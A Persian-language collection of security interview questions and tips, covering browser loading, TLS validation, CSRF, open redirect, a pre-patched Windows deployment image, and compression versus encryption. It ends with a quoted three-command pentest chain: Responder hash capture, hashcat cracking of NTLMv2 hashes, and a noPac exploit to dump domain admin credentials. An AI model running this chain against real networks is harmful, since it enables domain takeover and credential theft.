FAQs

FAQs On Web سوالات جالب توجه که در سایت های مختلف دیدم : سوال مصاحبه: وقتی به یه پورت تو لینوکس که هیچ پروسه‌ای روش LISTEN نمیکنه، پکت SYN میفرستیم، چه جوابی میگیریم و جواب از کجا میاد؟ یکی از بخشای مورد علاقه من تو این سوال بررسی Chain of trust توسط مرورگر هست و اینکه چطور مرورگر یک TLS certificate رو اعتبار سنجی میکنهQuote TweetAlireza Vaziri@aliereza · 17hسوال مصاحبه: تو مرورگر تایپ میکنی http://google.com، از لحظه‌ای که اینتر میزنی تا زمانی که صفحه کامل لود میشه چه اتفاق‌های میوفته؟ (جواب مورد قبول توضیح دقیق در حد ۵ دقیقه یا بیشتر هست)

اگه من مصاحبه ‌کنم:

۱. یه سایت رو توی مرورگر باز می‌کنیم، چی میشه؟ ۲. چطوری میشه جلوی CSRF رو گرفت؟ ۳. با Open Redirect چکار می‌شه کرد؟ ۴. سرور اینترنت‌بانک ملت بنظرت اینترنت داره؟ ۵. یه فایل آپلود پسوند رو امن چک می‌کنه، چه تستی می‌کنی؟

جواب رو میشه طوری داد که به سوال ۶ نرسه.

اگر سیستم عاملی آلوده بشه و مجبور بشید که سیستم عاملش رو تعویض کنید، وقتی اولین بار نصبش کردید و بوت شد و آمد بالا، بازم در شبکه ای آلوده، روشن شده و تا بیایید شبکه ر‌و وصل کنید که ویندوز آپدیت کنید و آنتی ویروس نصب کنید، احتمال اینکه دوباره آلوده بشه خیلی بالاست. راهکار چیه ؟ شما هر نوع ویندوزی که نیاز دارید، در یک شبکه ی ایزوله از شبکه ی عملیاتی و کاری نصب کنید و آخرین به روزرسانی ها رو هم نصب میکنید و با سرویس های: WDS or SCCM یک ایمیج قابل نصب ویندوز، تهیه میکنید و هر زمانی که نیاز بود ویندوز جدید نصب کنید، با این سرویس اینکار رو انجام میدید، که باعث میشه اولین بوت در اون سیستم عامل، ویندوز فول آپدیت داشته باشید. اما هنوز مسئله ی دوم یعنی آنتی ویروس باقیمانده. اینجاست که بازم ویندوز دیفندر میدرخشنه اونم بدون هزینه. مایکروسافت امکان ایمپورت کردن آپدیت ویندوز دیفندر روی ایمیج های آفلاین ویندوز رو ارائه کرده، یعنی شما آخرین آپدیت آنتی ویروس ویندوز دیفندر رو دانلود میکنید و با کامند پاورشل ایمپورت می کنید توی ایمیج ویندوزتون. حالا وقتی از اون ایمیج ویندوز، دارید هر جایی ویندوز نصب میکنید، اولین باری که اون سیستم عامل بوت میشه و در شبکه روشن میشه، هم ویندوزش آپدیت هست و هم آنتی ویروس اش. پس اگر در شبکه ی آلوده نصب و روشن بشه، احتمال آلودگی دوباره اش خیلی میاد پایین.

میشه گفت کدوم بهینه‌اس؟ ۱. یه دیتا رو اول فشرده کنیم بعد رمزنگاری ۲. اول رمزنگاری بشه بعد فشرده‌سازی پاسخ: دیتای رمزشده رو نمیشه فشرده کرد. یعنی می‌ره تو الگوریتم ولی چیزی از حجمش کم نمیشه. فشرده سازی معمولا تابعی از correlation دیتا اولیه هست، اگر اول رمزنگاری کنی کیفیت فشرده سازی ممکنه خراب بشه چون تضمینی نیست دیتای رمزنگاری شده هم همون correlation دیتای اصلی رو داشته باشه

vFirst 10 minutes on a pentest:

1. responder -I eth0 -Pv
2. hashcat.bin -m 5600 -O -w 3 hash.txt rockyou.txt -r clem9669_small.rule (thanks @Bandrel )
3. http://noPac.py example/user:'pass' -dc-ip 10.0.0.1 -dc-host dc1 --impersonate administrator -dump

Now I'm a DA!